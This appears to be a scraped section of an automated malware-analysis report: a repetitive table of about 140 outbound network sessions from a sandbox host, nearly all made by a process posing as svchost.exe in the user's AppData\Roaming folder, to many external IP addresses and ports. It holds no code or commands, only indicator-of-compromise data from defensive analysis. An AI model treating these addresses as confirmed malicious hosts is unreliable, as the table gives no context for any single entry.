                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6495192.168.2.561269207.244.255.1741977043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6496192.168.2.56186734.49.208.2218043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6497192.168.2.561289162.240.231.2116210943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6498192.168.2.561138103.90.227.244312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6499192.168.2.56121695.165.163.1883649643220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6500192.168.2.56142051.222.241.157571743220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6501192.168.2.56133392.205.61.38430043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6502192.168.2.561334167.99.131.118043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6503192.168.2.56144882.113.157.1223128043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6504192.168.2.56148350.62.134.1396260743220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6505192.168.2.561030194.233.78.1423447143220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6506192.168.2.56125472.167.222.113412543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6507192.168.2.56116164.227.108.253190843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6508192.168.2.561436172.245.159.1778043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6509192.168.2.5614765.189.158.162312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6510192.168.2.561503122.3.41.154809043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6511192.168.2.561082120.194.4.157544343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6512192.168.2.56388347.74.152.29888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6513192.168.2.559823111.53.178.249730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6514192.168.2.560018159.65.77.168858543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6515192.168.2.564000207.180.198.2412766656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6516192.168.2.559942103.76.180.108312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6517192.168.2.56394894.131.14.66312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6518192.168.2.55996558.234.116.197819743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6519192.168.2.560004201.174.239.28415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6520192.168.2.55996694.131.14.66108143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6521192.168.2.560054104.16.109.2078043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6522192.168.2.559962171.244.140.1603627343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6523192.168.2.55998184.39.112.144312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6524192.168.2.560079104.25.114.288043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6525192.168.2.55997758.20.248.139900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6526192.168.2.5600033.37.125.76312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6527192.168.2.559998185.220.226.23580843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6528192.168.2.56021123.227.38.2308043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6529192.168.2.56410350.63.12.335281456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6530192.168.2.5600128.219.228.1001567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6531192.168.2.564204162.214.90.493440956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6532192.168.2.558918142.54.229.249414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6533192.168.2.55971140.76.160.143900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6534192.168.2.560343104.25.234.818043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6535192.168.2.560362104.20.103.688043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6536192.168.2.555823103.76.180.108312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6537192.168.2.560077200.10.73.210567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6538192.168.2.55996772.49.49.113103443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6539192.168.2.560359204.236.176.618043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6540192.168.2.560243181.129.198.58567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6541192.168.2.560462104.18.103.1258043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6542192.168.2.560358162.214.225.2234326543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6543192.168.2.5601563.10.93.50312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6544192.168.2.5600998.218.231.621567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6545192.168.2.560451162.214.90.493440943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6546192.168.2.56014043.133.70.571567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6547192.168.2.560085187.40.1.12312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6548192.168.2.56033644.190.9.654810043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6549192.168.2.560536104.17.132.798043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6550192.168.2.560541203.30.188.2478043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6551192.168.2.55594191.149.203.126108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6552192.168.2.560391199.58.184.97414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6553192.168.2.56420045.11.95.166600856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6554192.168.2.56028120.37.207.8808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6555192.168.2.55967436.89.10.514426843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6556192.168.2.56045251.222.97.87808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6557192.168.2.55969794.131.14.66312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6558192.168.2.56033745.81.232.174705643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6559192.168.2.559299111.20.217.178909143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6560192.168.2.55976947.243.114.192818043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6561192.168.2.560300167.172.86.461047143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6562192.168.2.56025952.172.1.186312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6563192.168.2.560592104.16.109.2138043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6564192.168.2.56037665.21.255.197312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6565192.168.2.5603248.142.3.145330643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6566192.168.2.560461220.118.191.238312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6567192.168.2.560609104.17.171.2358043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6568192.168.2.56033483.243.92.154808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6569192.168.2.560449202.83.102.83808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6570192.168.2.560365161.97.173.784914543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6571192.168.2.560666104.17.62.878043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6572192.168.2.560595103.35.190.18312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6573192.168.2.56051047.93.121.2008043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6574192.168.2.55630651.158.98.2111637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6575192.168.2.56051343.255.113.2328443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6576192.168.2.556105181.204.184.12299943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6577192.168.2.556274173.212.209.493952243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6578192.168.2.560703172.67.254.1278043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6579192.168.2.560715104.24.220.528043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6580192.168.2.560720162.159.242.88043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6581192.168.2.556309152.228.140.2254466443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6582192.168.2.564217104.248.158.785339656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6583192.168.2.564296185.123.53.59312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6584192.168.2.564275128.199.196.315771556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6585192.168.2.56061846.17.63.1661000043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6586192.168.2.564105159.223.71.715118756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6587192.168.2.56063613.38.176.104312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6588192.168.2.56055247.74.152.29888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6589192.168.2.56066493.190.141.1024785143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6590192.168.2.560602128.199.196.315771543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6591192.168.2.55986127.65.240.157108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6592192.168.2.55881127.65.114.8108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6593192.168.2.56064285.214.118.988043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6594192.168.2.564350198.49.68.808043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6595192.168.2.560563203.95.198.170808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6596192.168.2.56067043.131.246.771567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    6597192.168.2.56077431.204.28.1365432
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6598192.168.2.560832104.25.108.1208043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6599192.168.2.56076938.162.13.126312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6600192.168.2.556488162.241.45.225052843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6601192.168.2.560897104.16.207.868043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6602192.168.2.559827203.222.24.368043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6603192.168.2.55989045.140.189.952900343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6604192.168.2.56076194.131.14.66108143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6605192.168.2.560873162.159.243.1788043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6606192.168.2.556808147.124.212.312423043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6607192.168.2.56083651.222.241.1574035143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6608192.168.2.556430181.129.243.3599943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6609192.168.2.560706184.185.2.12414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6610192.168.2.560987104.23.128.1748043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6611192.168.2.560997104.20.178.1668043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6612192.168.2.561038203.24.108.1948043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6613192.168.2.561040104.17.166.2108043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6614192.168.2.561159104.16.105.1428043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6615192.168.2.560967185.238.228.678043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6616192.168.2.560988103.152.112.1458043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6617192.168.2.559978199.229.254.129414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6618192.168.2.55662754.36.122.161718843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6619192.168.2.56094944.190.9.654810043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6620192.168.2.560732103.49.202.2528043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6621192.168.2.560842221.153.92.398043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6622192.168.2.559886190.110.226.1628043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6623192.168.2.56081580.67.8.68043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6624192.168.2.560927217.69.121.141580643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6625192.168.2.561273172.67.181.1298043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6626192.168.2.56085958.234.116.1978043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6627192.168.2.55988245.11.95.165504743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6628192.168.2.56080062.152.53.186890943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6629192.168.2.560290112.51.96.118909143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6630192.168.2.56082551.83.140.70818143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6631192.168.2.564503103.152.112.1458056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6632192.168.2.56077984.39.112.144312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6633192.168.2.560790200.174.198.95888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6634192.168.2.55881960.188.102.2251808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


